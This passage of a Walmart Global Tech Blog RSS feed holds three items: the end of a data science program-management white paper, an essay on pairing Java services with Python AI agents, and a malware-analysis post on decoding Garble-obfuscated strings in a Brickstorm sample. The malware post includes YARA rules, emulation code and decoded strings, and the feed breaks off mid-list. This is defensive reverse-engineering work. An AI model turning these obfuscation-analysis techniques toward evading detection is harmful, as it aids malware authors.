signals.</p><p><strong>Feature Selection:</strong> An essential part of modelling is choosing which features from the dataset to include during training and inference. Selecting the right features ensures the model focuses on variables that truly influence outcomes, improving accuracy and reducing complexity. For example, in demand forecasting, historical sales, seasonality, and promotions are relevant, while internal IDs or random codes add no predictive value and should be excluded.</p><p><strong>Challenges<br> </strong>Data Science experimentation often caused missed deadlines — accuracy fluctuated across iterations, and coordination issues during integration slowed down progress.</p><p><strong>Effort vs. Output Misalignment: </strong>Building models often requires multiple iterations, and failures are common, so the visible output may not reflect the effort invested.</p><p><strong>TPM Intervention</strong></p><p>· <strong>Work Modularization:</strong> Broke modelling into distinct work units, enabling early engineering handoffs while Data Science iterated further.</p><p>· <strong>Parallelization:</strong> While one model group moved into engineering validation, others continued in experimentation.</p><p>· <strong>Segmentation:</strong> Models organized by forecast horizon (short vs. long) and SKU type (low/medium/high velocity, new items) to align iterations with business needs.</p><p>· <strong>Iteration Planning:</strong> Each group followed 2–3 sprint cycles with checkpoints for feature enrichment, validation, and stakeholder review. 
Prioritization focused on high-velocity SKUs and new launches.</p><p>· <strong>Governance:</strong> Central dashboards tracked model progress, validation status, and readiness for deployment, giving stakeholders real-time visibility.</p><p><strong>Introduced a few Predictability Mechanisms</strong></p><p>· <strong>Defined iteration cycles</strong> (2–3 sprints per model group).</p><p>· <strong>Validation gates</strong> at each cycle using thresholds (MAPE, RMSE, recall/precision benchmarks).</p><p>· <strong>Early handoffs</strong>: Once a model crossed baseline performance, partially validated versions were transferred to Engineering. This allowed pipeline and integration <strong>testing in parallel</strong> with ongoing DS refinements.</p><p>· <strong>Stakeholder checkpoints</strong> ensured business validation before downstream adoption.</p><p><strong>Outcome<br> </strong>This structure brought predictability and enabled end-to-end optimization: accuracy improved steadily across cycles, early validations reduced integration risk, and the models ultimately supported smarter inventory decisions across geo-clusters.</p><p><strong>Documentation:</strong> Established a structured process to capture failed experiments, document reasons for failure, and log effort invested. This ensures transparency, preserves learnings, and prevents repeated mistakes.</p><p><strong>Key Takeaway</strong></p><p><strong>Modularize the model work</strong> to enable parallel progress across Data Science and Engineering teams.</p><p><strong>Phase 4: Implementation &amp; Validation</strong></p><p>This phase emphasized ensuring that forecasts were both statistically reliable and practically usable for business operations. Beyond accuracy metrics, the focus was on building trust with stakeholders and ensuring seamless integration into production systems.</p><p><strong>Challenge — Business Trust and Production Readiness</strong><br> While the models met validation thresholds (MAPE, BIAS), business teams were hesitant to adopt them due to under-forecasting for new SKUs and concerns about stability in production. This created a gap between technical validation and operational confidence.</p><p><strong>Model Drift Over Time:</strong> Once deployed, models may lose accuracy because the real-world data distribution changes. The datasets used for initial training may no longer represent current conditions, leading to degraded performance.</p><p><strong>TPM Intervention</strong><br> To bridge this gap, the TPM mandated that <strong>user validation scenarios</strong> be defined upfront as part of the planning cycle, ensuring that evaluation criteria were business-driven and aligned with operational needs. To avoid downstream delays, the TPM ensured these scenarios were ready before modelling began, creating clarity on success metrics early. In parallel, the TPM brought <strong>Data Engineering</strong> into the process from the start, enabling pipelines to be built alongside model development rather than after, which reduced bottlenecks during integration. Business teams were also introduced to dashboards that continuously compare forecasts against actuals, ensuring models remain reliable and do not drift over time. This visibility enables early detection of performance degradation and triggers retraining workflows when needed.</p>
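<p>For illustration only (this is not the program’s actual tooling), the drift check behind such a dashboard can be as simple as recomputing MAPE over a recent window of forecasts versus actuals and raising a retraining trigger when it breaches the agreed threshold; the 20% threshold below is a hypothetical value.</p><pre># Illustrative sketch: recompute MAPE on recent forecasts vs. actuals<br># and flag drift when the error breaches an agreed threshold.<br>def mape(actuals, forecasts):<br>    # Mean Absolute Percentage Error, skipping zero actuals to avoid division by zero.<br>    pairs = [(a, f) for a, f in zip(actuals, forecasts) if a != 0]<br>    return 100.0 * sum(abs(a - f) / abs(a) for a, f in pairs) / len(pairs)<br><br>def needs_retraining(actuals, forecasts, threshold_pct=20.0):<br>    # Hypothetical trigger: True when recent MAPE exceeds the threshold.<br>    return mape(actuals, forecasts) &gt; threshold_pct<br><br># Example: weekly actuals vs. forecasts for one SKU/geo cluster.<br>print(mape([100, 120, 80], [110, 115, 70]))              # ~8.9, within tolerance<br>print(needs_retraining([100, 120, 80], [60, 200, 30]))   # True, retraining needed</pre>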
<p><strong>Outcome</strong><br> Business gained confidence through clear visibility into model behaviour, while engineering ensured reliability at scale. Phased adoption across categories reduced operational risk and accelerated trust-based deployment.</p><p><strong>Key Takeaway</strong></p><p>Work with business stakeholders during planning to decide <strong>the validation scenarios upfront</strong>. <strong>Engage Data Engineering early</strong> to build pipelines in parallel with model development. Partner with business to <strong>set up dashboards</strong> to compare forecasts with past actuals.</p><p><strong>Phase 5: Deployment &amp; Change Management</strong></p><p>This phase focused on taking models from controlled development environments into production, ensuring they worked reliably within real-world systems. Running models is computationally intensive and requires the right infrastructure.</p><p><strong>Challenges</strong> — <strong>Scalability and Tooling Misalignment</strong></p><p>Large models demanded compute-heavy environments, but infrastructure provisioning was often treated as an afterthought, leading to late-stage delays. For example, model training slowed drastically when cloud capacity was not reserved in advance. On top of this, Data Science and Engineering teams operated in incompatible environments, causing runtime failures and failed deployments.</p><p><strong>TPM Intervention</strong></p><p>Infrastructure provisioning was made a mandatory kick-off task for all initiatives. Cloud capacity was provisioned early, with compatibility checks and sandbox validations built into the project timeline. This shift ensured alignment between Data Science and Engineering from the outset, reducing friction at deployment time. We also planned costs upfront with DS, Engineering, and Business teams to forecast compute needs and budgets. This gave financial clarity and confidence that the approach would be sustainable, deliver ROI, and support long-term growth.</p><p><strong>Outcome</strong></p><p>The structured approach minimized runtime failures and unblocked deployments. Teams no longer lost time to environment mismatches, and models were deployed faster, with more predictable cost and compute efficiency.</p><p><strong>Key Takeaway</strong></p><p>Plan early for the needed infrastructure, define deployment strategies (batch, real-time, A/B testing), plan integration with downstream applications, and establish rollback plus monitoring mechanisms.</p><p><strong>Phase 6: Monitoring &amp; Optimization</strong></p><p>Post-deployment, the priority shifted to tracking whether forecasts translated into measurable business outcomes. Deviations would need to be handled by the team accountable for the specific problem seen.</p><p><strong>Challenges</strong> — <strong>Unclear Accountability</strong></p><p>Early on, teams struggled with unclear accountability — pipeline errors sat with Engineering, while missed accuracy thresholds were debated between Analytics and Data Science.</p><p><strong>TPM Intervention</strong></p><p>The TPM defined clear accountability for post-deployment anomalies by creating ownership maps and SLA-based resolution timelines: pipeline issues were assigned to Engineering, accuracy deviations to Data Science, and business validation gaps to Analytics. Real-time dashboards tracked anomalies and enforced the SLAs.</p><p><strong>Outcome</strong></p><p>By introducing a formal ownership map and lightweight dashboards, every anomaly had a clear owner and SLA for resolution. 
This not only accelerated troubleshooting but also created a repeatable loop where insights directly fed into model retraining, keeping performance aligned with business expectations.</p><p><strong>Key Takeaway</strong></p><p>Establish <strong>clear accountability for issues</strong> that are anticipated when the solution is deployed and keep performance aligned with business KPIs.</p><p><strong>✅ Conclusion: A Scalable Framework Emerges</strong></p><p>A structured, phase-driven approach to Data Science program management enables scalable and predictable outcomes. By anchoring planning to business objectives and measurable success metrics, proactively resolving data quality gaps, and modularizing modelling work for parallel progress, TPMs fostered team alignment and accelerated delivery. Early definition of validation scenarios and infrastructure needs ensured forecasts were both accurate and operationally trusted, while robust deployment strategies minimized runtime failures. Post-launch, clear accountability and real-time dashboards enabled rapid troubleshooting and continuous model improvement. Collectively, these interventions delivered speed with rigor, improved forecast accuracy, drove stakeholder adoption, and established a repeatable framework for tangible business impact.</p><p>“<em>Because there is so much experimentation, there is a possibility that the problem statement gets invalidated based on the outcomes derived.”</em></p><p><strong>5.</strong> <strong>References</strong></p><p>· Project Management Institute (PMI). “A Guide to the Project Management Body of Knowledge (PMBOK® Guide)”. This guide offers a comprehensive framework for managing projects effectively and can be adapted for Data Science programs.</p><p>· Google Cloud. “AI &amp; Machine Learning Products”. Learn about tools and platforms that can enhance data validation, tracking, and goal alignment.</p><p>· McKinsey &amp; Company. “The Analytics Translator: Bridging the Gap between Data Science and Business”. This article provides insights into aligning data science goals with business priorities.</p><p>· Harvard Business Review. “Why IT Fumbles Analytics”. This resource discusses the challenges of managing analytics projects and offers practical strategies for success.</p><p>· <strong>Machine Learning Operations: Model handover (from Data Science to Engineering) Process checklist</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*iY4JmZUc9aCJmt6LR65H4g.png" /></figure><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=08dc2535bd1a" width="1" height="1" alt=""><hr><p><a href="https://medium.com/walmartglobaltech/white-paper-on-data-science-technical-program-management-08dc2535bd1a">White Paper on Data Science Technical Program Management</a> was originally published in <a href="https://medium.com/walmartglobaltech">Walmart Global Tech Blog</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Keeping Java as the Core, Python to Lead Agentic Systems]]></title>
            <link>https://medium.com/walmartglobaltech/keeping-java-as-the-core-python-to-lead-agentic-systems-e2960693e1cd?source=rss----905ea2b3d4d1---4</link>
            <guid isPermaLink="false">https://medium.com/p/e2960693e1cd</guid>
            <category><![CDATA[ai-agent]]></category>
            <category><![CDATA[agentic-applications]]></category>
            <category><![CDATA[ai-agent-development]]></category>
            <dc:creator><![CDATA[Anil Gothal]]></dc:creator>
            <pubDate>Mon, 15 Dec 2025 16:35:38 GMT</pubDate>
            <atom:updated>2025-12-15T16:35:38.901Z</atom:updated>
            <content:encoded><![CDATA[<p>We’ve been a Java shop for years, and now agentic AI demands that we rethink.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*cKEBACyju1WFd52yOjCm_A.png" /></figure><h3>How I got here?</h3><p>I’ve been in the Java world for more than 30 years. Java has been my default answer to “what should we build this in?” for most of my career. I’ve seen it grow from applets and early web apps to large-scale enterprise systems, microservices, and cloud-native platforms.</p><p>I’ve loved Java and still do. It has given me a solid, safe, and scalable way to build systems that actually <strong>run in production</strong>.</p><p>For most of my career, this mental model worked:</p><blockquote>New system? Java<br>New service? Java<br>Something serious, important, enterprise? Java</blockquote><p>Then, earlier this year, I stepped into the agentic AI ecosystem and that “Java first” instinct started working <strong>against</strong> me!</p><h3>When “Java first” started to hurt?</h3><p>I tried to stay in my comfort zone. I tried.</p><ul><li>I built my first <strong>MCP server blueprint</strong> using Spring Framework (org.springframework.ai) around May 2025 (early release), when everything in this space was just getting started.</li><li>I built an early <strong>local AI agent</strong> using Java with Google’s ADK to wire tools and tasks together.</li></ul><p>On paper, it looked great:</p><blockquote>1. Java<br>2. Spring<br>3. Strong typing<br>4. Familiar tooling</blockquote><p>But in practice, it felt like I was constantly <strong>swimming upstream</strong>:</p><blockquote>More glue code than I wanted<br>More boilerplate<br>More “why is this so hard?” moments<br>More time fighting infrastructure instead of experimenting with AI behavior</blockquote><p>That’s when I realized: I hadn’t hit a wall because Java is “bad”. I hit a wall because <strong>agentic AI is a different kind of work</strong> than what we historically do in Java.</p><h3>What actually changed with agentic AI?</h3><h4>Speed and first-class support</h4><p>In the LLM / agent ecosystem, almost everything shows up in Python first:</p><blockquote>New libraries<br>New patterns<br>New evaluation frameworks<br>Community research code, tutorials, etc.</blockquote><p>If you want to try an idea <strong>today</strong>, chances are:</p><blockquote>The official examples are in Python<br>The reference implementation is in Python<br>The community discussion assumes Python</blockquote><p>In Java, I kept finding myself in <strong>DIY mode</strong>:</p><blockquote>“There’s a Python example… ok, now let me re-create the entire stack in Java, adjust types, wiring, configs, and hope it behaves the same.”</blockquote><p>That’s not where you want to spend your time when everything in AI is changing weekly.</p><h4>Experimentation vs. stability</h4><p>Traditional Java enterprise systems optimize for <strong>stability</strong>:</p><blockquote>1. Well-defined interfaces<br>2. Strict contracts<br>3. Long-lived services<br>4. Strong governance and change control</blockquote><p>Agentic AI optimizes for <strong>experimentation</strong>:</p><blockquote>1. Prompts change frequently (sometimes daily)<br>2. You add/remove tools<br>3. You try new reasoning flows<br>4. You swap models or providers to see what works better.</blockquote><p>Java and Spring are fantastic for <strong>long-lived, stable, governed microservices</strong>. 
They are <em>not</em> naturally optimized for the messy, “try 10 ideas and keep 1” world of early AI experimentation.</p><p>For that kind of work, you want:</p><blockquote>Less ceremony<br>Faster iteration<br>Shorter feedback loops</blockquote><p>That’s exactly where Python shines.</p><h4>Agent code is mostly orchestration, not the real business logic</h4><p>In the traditional world, <strong>the code that does the work</strong> lives inside your Java services:</p><blockquote>Business rules<br>Validations<br>Domain models<br>Transactions</blockquote><p>In the AI agent world, the heavy lifting shifts:</p><blockquote>The <strong>LLM</strong> does the reasoning, planning, and language understanding.<br><strong>Tools</strong> and <strong>data sources</strong> do the actual work (APIs, DB queries, searches, actions).</blockquote><p>The agent itself becomes mostly <strong>orchestration and glue</strong>:</p><blockquote>“Take user intent → figure out what tools to call → call them in the right order → reason about the responses → decide the next step.”</blockquote><p>This kind of glue code:</p><blockquote>Changes frequently<br>Lives close to prompts and model configs<br>Is easier to express in a concise, dynamic language</blockquote><p>Writing this orchestration in Python is simply <strong>much faster</strong> than doing it in Java.</p><h4>MCP servers are adapters, not full business systems</h4><p>When I wrote my first MCP server blueprint in Spring, I instinctively treated it like a typical enterprise service:</p><blockquote>Layers<br>DTOs<br>Configuration<br>Dependency injection<br>The whole Java “production-grade” toolkit!</blockquote><p>But that’s not what an MCP server really is.</p><p>An MCP server is basically an <strong>adapter</strong>:</p><blockquote>Receive a simple, structured request from the model<br>Call an existing service or database<br>Return a clean, structured response back</blockquote><p>That’s it.</p><p>For this kind of lightweight adapter work, Python is usually a better fit:</p><blockquote>Less boilerplate<br>Faster to write and publish<br>Easier to iterate as your tools and schemas evolve</blockquote><h3>Let’s take a scenario: two approaches</h3><p><strong>Scenario:</strong><br> “<em>Given a customer’s request, decide whether to approve an order, check credit, apply discounts, and notify.</em>”</p><h4>If I build this purely in Java</h4><p>I’m tempted to:</p><blockquote>1. Design a full microservice (or several)<br>2. Define DTOs, interfaces, and controller endpoints<br>3. Bake the logic into Java classes<br>4. Go through normal deployment, governance, and release cycles</blockquote><p>This is great when the rules are <strong>stable</strong> and you want strong guarantees.</p><h4>If I build this with Python agents + Java services</h4><p>I change my mindset:</p><blockquote>1. Keep the <strong>core logic and data</strong> in Java: credit-service, pricing-service, profile-service<br>2. Add a <strong>Python agent</strong> that talks to the LLM, calls those Java services via MCP tools or HTTP APIs,<br>3. 
and orchestrates the flow: “Check credit → if high-risk, ask for manual review → otherwise, fetch pricing → apply rules → approve/deny → send notification.”</blockquote><p>Whenever the decision logic or flow changes:</p><blockquote><em>I mostly update </em><strong><em>Python agent behavior and prompts</em></strong><em>.<br>Java services stay stable, governed, and reliable.</em></blockquote><p>This feels <strong>natural</strong>: Java keeps doing what it’s amazing at; Python takes the fast-changing orchestration role around the AI.</p><h3>The key realization: it’s not Java vs Python</h3><p>The important shift for me was this:</p><blockquote><em>I don’t need to choose </em><strong><em>Java or Python</em></strong><em>.<br>I need to choose </em><strong><em>where Java is right</em></strong><em>, and </em><strong><em>where Python is right</em></strong><em>.</em></blockquote><p>From my experience so far:</p><h4>Where Java is still the best choice?</h4><blockquote>1. Core business services<br>2. Transactional systems of record<br>3. High-QPS, low-latency APIs<br>4. Long-lived, stable, well-governed microservices<br>5. Places where you need strict contracts, compliance, and reliability over many years.</blockquote><h4>Where Python is the better choice?</h4><blockquote>1. AI agents (prompt-heavy, fast-changing, experiment-driven)<br>2. MCP servers and tools (adapters exposing data/actions to models)<br>3. Data science, ML training, feature engineering, evaluation pipelines<br>4. Prototypes and “let’s see if this works” flows</blockquote><p>When I tried to force <strong>agents</strong> and <strong>MCP patterns</strong> into pure Java/Spring, I could make it work, but it felt like:</p><blockquote><em>Writing a UI in assembly language: technically possible, but you’re fighting the grain of the tools.</em></blockquote><h3>A simple architectural pattern: Java in the middle, Python at the edge</h3><p>The way I now think about it is in <strong>layers</strong>:</p><blockquote><strong>1. Core Systems (Java)</strong><br>- Systems of record<br>- Domain logic, validations, transactions<br>- APIs with stable contracts</blockquote><blockquote><strong>2. Adapters / Tools (Mostly Python MCP servers)</strong><br>- Thin wrappers around those Java services and databases<br>- Fast to change, but still structured and testable</blockquote><blockquote><strong>3. Agents &amp; Experiences (Python + LLMs)</strong><br>- Agent logic (tool selection, sequencing, reasoning about results)<br>- Experiments, new flows, new user journeys</blockquote><p>If I had to describe it in one line:</p><blockquote><strong><em>Java holds the truth. Python explores the possibilities.</em></strong></blockquote><h3>How I personally envision the work today?</h3><p>My mental model now is very simple:</p><blockquote><strong>Java</strong>: the backbone — where the business actually lives.</blockquote><blockquote><strong>Python</strong>: the face and the hands — where the AI lives, coordinates, and experiments.</blockquote><p>I still love Java. I still default to Java when I think about <strong>serious, long-term systems</strong>.</p><p>But when it comes to AI <strong>Agents, MCP servers, and fast-moving agentic work</strong>, I’ve learned to let Python lead — not because Java can’t do it, but because it’s not the right kind of tool for that style of work.</p>
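<p>To make that layering concrete, here is a deliberately tiny sketch of the order scenario above. It is illustrative only: the service URLs, payload fields, and the decide_order flow are hypothetical, and a real agent would put an LLM and MCP tools in the loop rather than plain HTTP calls.</p><pre># Hypothetical sketch: Python orchestrates, the Java services own the logic.<br>import requests<br><br>CREDIT_URL = &quot;http://credit-service/api/v1/score&quot;    # assumed endpoint<br>PRICING_URL = &quot;http://pricing-service/api/v1/quote&quot;  # assumed endpoint<br><br>def decide_order(customer_id, order):<br>    # 1. Check credit via the existing Java credit-service.<br>    credit = requests.get(CREDIT_URL, params={&quot;customerId&quot;: customer_id}, timeout=5).json()<br>    if credit[&quot;risk&quot;] == &quot;HIGH&quot;:<br>        return {&quot;decision&quot;: &quot;MANUAL_REVIEW&quot;, &quot;reason&quot;: &quot;high credit risk&quot;}<br><br>    # 2. Fetch pricing and apply rules; an LLM could reason over these responses here.<br>    quote = requests.post(PRICING_URL, json=order, timeout=5).json()<br>    return {&quot;decision&quot;: &quot;APPROVE&quot;, &quot;total&quot;: quote[&quot;total&quot;]}</pre><p>Changing the flow means editing this thin Python layer (or its prompts), while credit-service and pricing-service stay stable and governed in Java.</p>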
<h3>One resource I <strong>recommend</strong> for Java folks</h3><p>As a Java person stepping into Python, I found it useful to learn in a way that speaks my language and constraints. One book I personally enjoyed as a starting point is:</p><blockquote><a href="https://www.goodreads.com/book/show/77053786-python-for-java-developers"><strong>Python for Java Developers: A Handbook for Busy Experts<em> — Pedro Cavaléro</em></strong></a></blockquote><p>It doesn’t try to convince you that Java is obsolete. It simply helps you quickly <strong>see how to think in Python</strong> without abandoning everything you know from decades of Java.</p><p>If you’re a Java veteran like me, you don’t have to choose sides.<br>Keep Java as the core.<br>Let Python lead your agentic systems.<br>Use each tech stack and language where it’s naturally strong, and your architecture (and teams) will thank you for it!</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=e2960693e1cd" width="1" height="1" alt=""><hr><p><a href="https://medium.com/walmartglobaltech/keeping-java-as-the-core-python-to-lead-agentic-systems-e2960693e1cd">Keeping Java as the Core, Python to Lead Agentic Systems</a> was originally published in <a href="https://medium.com/walmartglobaltech">Walmart Global Tech Blog</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Decoding Brickstorms Garble strings]]></title>
            <link>https://medium.com/walmartglobaltech/decoding-brickstorms-garble-strings-b0a60828b3cc?source=rss----905ea2b3d4d1---4</link>
            <guid isPermaLink="false">https://medium.com/p/b0a60828b3cc</guid>
            <category><![CDATA[malware]]></category>
            <category><![CDATA[infosec]]></category>
            <category><![CDATA[golang]]></category>
            <category><![CDATA[reverse-engineering]]></category>
            <dc:creator><![CDATA[Jason Reaves]]></dc:creator>
            <pubDate>Thu, 04 Dec 2025 20:39:03 GMT</pubDate>
            <atom:updated>2025-12-04T20:39:02.303Z</atom:updated>
            <content:encoded><![CDATA[<p>By: Jason Reaves</p><p>From the recent attention to Brickstorm in public reporting, I analyzed the Brickstorm sample listed below that was recently uploaded to Virustotal:</p><pre>90b760ed1d0dcb3ef0f2b6d6195c9d852bcb65eca293578982a8c4b64f51b035</pre><p>This sample was obfuscated via an open-source Golang tool called Garble[4] which was mentioned by Mandiant[1]. Mandiant also released a tool for decoding Garble strings[2] which was based on prior work by OALabs[3].</p><p>A quick note before diving in: I developed my string decoder independently, without first reviewing the work published by Google Threat Intelligence (GTI). Interestingly, my approach ended up aligning closely with their research on similar samples. I want to spotlight the method detailed in GTI’s blog, which takes a deep dive into Garble’s AST transformation code, a technique that offered valuable insight into how the obfuscation operates.</p><p>The strings are mostly stack based although some of the larger ones reside elsewhere and are loaded.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*tBOygD0mb1GkiE6XCNdESw.png" /></figure><p>For harvesting the bytecode sequences I decided to leverage a few possible yara rules which started strict and was relaxed as I continued my work:</p><pre>#good for most<br>#rules = yara.compile(source=&#39;rule urls { strings: $a1 = {48 b8 [8] 48 89 [3] 48 b8 [10-200] 48 [2] 48 [3] 7c ??} condition: all of them }&#39;)<br>rules = yara.compile(source=&#39;rule urls { strings: $a1 = {48 b8 [8] 48 89 [3] [10-400] 48 [2] 48 [3] 7c ??} condition: all of them }&#39;)<br>rules2 = yara.compile(source=&#39;rule urls { strings: $a1 = {48 8d [1-5] c? 44 [6] [10-400] 48 [2] 48 [3] 7c ??} condition: all of them }&#39;)<br></pre><p>After retrieving all the matches and removing possible substrings I can emulate the code:</p><pre>blobs = uniq_blobs<br>out = b&#39;&#39;<br>if True:<br>    STACK=0x9000<br>    code_base = 0x100000<br><br>    for blob in blobs:<br>        mu = Uc(UC_ARCH_X86,UC_MODE_64)<br>        mu.mem_map(code_base, 0x100000)<br>        mu.mem_map(STACK, 4096*10)<br>        #Make sure it ends gracefully<br>        blob = blob.matched_data+b&#39;\x90\x90\x90&#39;<br>        #Debugging<br>        #if binascii.unhexlify(&#39;48b8532f2e5e6d03c6b1488944244048&#39;) in blob:<br>        #    print(&quot;Found it&quot;)<br>        #    print(binascii.hexlify(blob))<br>        mu.mem_write(code_base, b&#39;\x00&#39;*0x100000)<br>        mu.mem_write(STACK, b&#39;\x00&#39;*(4096*10))<br><br>        mu.mem_write(code_base,blob)<br>        #Debugging:<br>        #mu.hook_add(UC_HOOK_BLOCK, hook_block)<br>        #mu.hook_add(UC_HOOK_CODE, hook_code)<br>        mu.reg_write(UC_X86_REG_RSP,STACK+4096)<br>        mu.reg_write(UC_X86_REG_RBP,STACK+4096)<br>        mu.reg_write(UC_X86_REG_ESP,STACK+4096)<br>        mu.reg_write(UC_X86_REG_EBP,STACK+4096)<br>        mu.reg_write(UC_X86_REG_RAX,0)<br>        try:<br>            mu.emu_start(code_base, code_base+len(blob), timeout=10000)<br>        except:<br>            continue<br>        a = mu.mem_read(STACK,4096*10)<br>        a = b&#39;&#39;.join(a.split(b&#39;\x00&#39;))<br>        l = mu.reg_read(UC_X86_REG_RAX)+1<br>        if len(a) &gt; 0:<br>            print(str(a)[-l:])<br>            out += a</pre><p>I noticed afterwords that OALabs also used a hook but they did so to find the next call instruction:</p><pre>    def trace(uc, address, size, user_data):<br>        insn = 
next(cs.disasm(uc.mem_read(address, size), address))<br>        #print(f&quot;{address:#010x}:\t{insn.mnemonic}\t{insn.op_str}&quot;)<br>        if insn.mnemonic == &#39;call&#39;:<br>            #print(&quot;Ending on a call!&quot;)<br>            uc.emu_stop()</pre><p>I like this approach and will definitely leverage it later, I primarily used hooks for debugging my code in comparison:</p><pre>def hook_block(uc, address, size, user_data):<br>    print(&quot;&gt;&gt;&gt; Tracing basic block at 0x%x, block size = 0x%x&quot; %(address, size))<br><br>def hook_code(uc, address, size, user_data):<br>    print(user_data)<br>    print(uc.reg_read(UC_X86_REG_RCX))<br>    print(&quot;&gt;&gt;&gt; Tracing instruction at 0x%x, instruction size = 0x%x&quot; %(address, size))<br><br>#Debugging:<br>#mu.hook_add(UC_HOOK_BLOCK, hook_block)<br>#mu.hook_add(UC_HOOK_CODE, hook_code)<br></pre><p>This won’t get every single string as some are passed as offsets to the data residing in rodata section for longer pieces. Decoding:</p><pre>Handshake&#39;<br>undefined&#39;<br>invalid perspective&#39;<br>Handshake&#39;<br>0-RTT Protected&#39;<br>unknown packet type: %d&#39;<br>QUIC_GO_LOG_LEVEL&#39;<br>initial RTT set after first measurement&quot;<br>%#x doesn&#39;t fit into 62 bits&quot;<br>invalid varint length&quot;<br>cannot encode %d in %d bytes&quot;<br>value doesn&#39;t fit into 62 bits: &quot;<br>chacha20: wrong key size&#39;<br>chacha20: SetCounter attempted to rollback counter&quot;<br>chacha20: output smaller than input&#39;<br>chacha20: invalid buffer overlap&#39;<br>chacha20: internal error: wrong dst and/or src length&#39;<br>chacha20: wrong HChaCha20 key size&#39;<br>chacha20: wrong HChaCha20 nonce size&#39;<br>GODEBUG sys/cpu: no value specified for &quot;&#39;<br>GODEBUG sys/cpu: value &quot;&#39;<br>&quot; not supported for cpu option &quot;&#39;<br>GODEBUG sys/cpu: unknown cpu feature &quot;&#39;<br>GODEBUG sys/cpu: can not enable &quot;&#39;<br>, missing CPU support\n&#39;<br>GODEBUG sys/cpu: can not disable &quot;&#39;<br>, required CPU feature\n&#39;<br>avx512vbmi&#39;<br>avx512vnniw&#39;<br>avx5124fmaps&#39;<br>avx512vpopcntdq&#39;<br>avx512gfni&quot;<br>avx512vaes&#39;<br>avx512vbmi2&#39;<br>avx512bitalg&#39;<br>avx512bf16&#39;<br>pclmulqdq&#39;<br>poly1305: write to MAC after Sum or Verify&#39;<br>chacha20poly1305: bad nonce length passed to Seal&#39;<br>chacha20poly1305: plaintext too large&#39;<br>chacha20poly1305: bad nonce length passed to Open&quot;<br>chacha20poly1305: ciphertext too large&#39;<br>chacha20poly1305: invalid buffer overlap&quot;<br>chacha20poly1305: invalid buffer overlap&quot;<br>chacha20poly1305: invalid buffer overlap&#39;<br>chacha20poly1305: invalid buffer overlap&quot;<br>20060102150405Z0700&#39;<br>cryptobyte: pending child length %d exceeds %d-byte length prefix&quot;<br>cryptobyte: BuilderContinuation reallocated a fixed-size buffer&quot;<br>cryptobyte: attempted write while child is pending&quot;<br>cryptobyte: length overflow&#39;<br>cryptobyte: Builder is exceeding its fixed-size buffer&#39;<br>bad point length: %d, expected %d&#39;<br>bad input point: low order point&#39;<br>hkdf: entropy limit reached&#39;<br>close notify&#39;<br>unexpected message&#39;<br>bad record MAC&#39;<br>decryption failed&#39;<br>record overflow&#39;<br>decompression failure&#39;<br>handshake failure&#39;<br>bad certificate&#39;<br>unsupported certificate&#39;<br>revoked certificate&#39;<br>expired certificate&#39;<br>unknown certificate&#39;<br>illegal parameter&#39;<br>unknown 
certificate authority&#39;<br>access denied&#39;<br>error decoding message&#39;<br>error decrypting message&#39;<br>export restriction&#39;<br>protocol version not supported&#39;<br>insufficient security level&quot;<br>internal error&#39;<br>inappropriate fallback&#39;<br>user canceled&#39;<br>unsupported extension&#39;<br>certificate unobtainable&#39;<br>unrecognized name&#39;<br>bad certificate status response&#39;<br>certificate required&#39;<br>no application protocol&#39;<br>GTLS 1.3, server CertificateVerify&quot;<br>_TLS 1.3, client CertificateVerify&#39;<br>tls: no certificates configured&#39;<br>CLIENT_RANDOM&#39;<br>CLIENT_EARLY_TRAFFIC_SECRET&#39;<br>CLIENT_HANDSHAKE_TRAFFIC_SECRET&quot;<br>SERVER_HANDSHAKE_TRAFFIC_SECRET&#39;<br>CLIENT_TRAFFIC_SECRET_0&#39;<br>SERVER_TRAFFIC_SECRET_0&#39;<br>tls: invalid ClientKeyExchange message&#39;<br>tls: invalid ServerKeyExchange message&#39;<br>res binder&#39;<br>c hs traffic&#39;<br>s hs traffic&#39;<br>c ap traffic&#39;<br>s ap traffic&#39;<br>exp master&#39;<br>res master&#39;<br>traffic upd&#39;<br>master secret&#39;<br>key expansion&quot;<br>client finished&quot;<br>server finished&#39;<br>tls: alert(&#39;<br>expected an ECDSA public key, got %T&#39;<br>Ed25519 verification failure&#39;<br>expected an RSA public key, got %T&quot;<br>expected an RSA public key, got %T&#39;<br>internal error: unknown signature type&#39;<br>unsupported signature algorithm: %v&quot;<br>unsupported signature algorithm: %v&#39;<br>tls: Ed25519 public keys are not supported before TLS 1.2&#39;<br>tls: unsupported public key: %T&#39;<br>tls: unsupported certificate: private key is %T, expected *%T&#39;<br>tls: certificate private key (%T) does not implement crypto.Signer&#39;<br>tls: unsupported certificate curve (%s)&#39;<br>tls: certificate RSA key size too small for supported signature algorithms&#39;<br>tls: unsupported certificate key (%T)&quot;<br>tls: peer doesn&#39;t support the certificate custom signature algorithms&quot;<br>tls: internal error: unsupported key (%T)&#39;<br>tls: internal error: wrong nonce length&#39;<br>tls: internal error: wrong nonce length&#39;<br>tls: internal error: wrong nonce length&quot;<br>tls: unable to generate random session ticket key: %v&#39;<br>s %x %x\n&#39;<br>tls: received unexpected handshake message of type %T when waiting for %T&#39;<br>TLS: sequence number wraparound&#39;<br>unknown cipher type&#39;<br>unknown cipher type&#39;<br>unknown cipher type&quot;<br>unsupported SSLv2 handshake received&#39;<br>received record with version %x when expecting version %x&#39;<br>remote error&#39;<br>remote error&#39;<br>tls: too many ignored records&#39;<br>local error&#39;<br>local error&#39;<br>unknown cipher type&#39;<br>tls: handshake message of length %d bytes exceeds maximum of %d bytes&#39;<br>tls: internal error: unexpected renegotiation&#39;<br>tls: unknown Renegotiation value&quot;<br>tls: too many non-advancing records&#39;<br>tls: received unexpected handshake message of type %T&#39;<br>tls: internal error: handshake should have had a result&#39;<br>tls: invalid NextProtos value&#39;<br>tls: NextProtos values too large&#39;<br>tls: no supported versions satisfy MinVersion and MaxVersion&#39;<br>tls: short read from Rand: &quot;<br>tls: short read from Rand: &#39;<br>c e traffic&quot;<br>resumption&#39;<br>tls: server selected unsupported protocol version 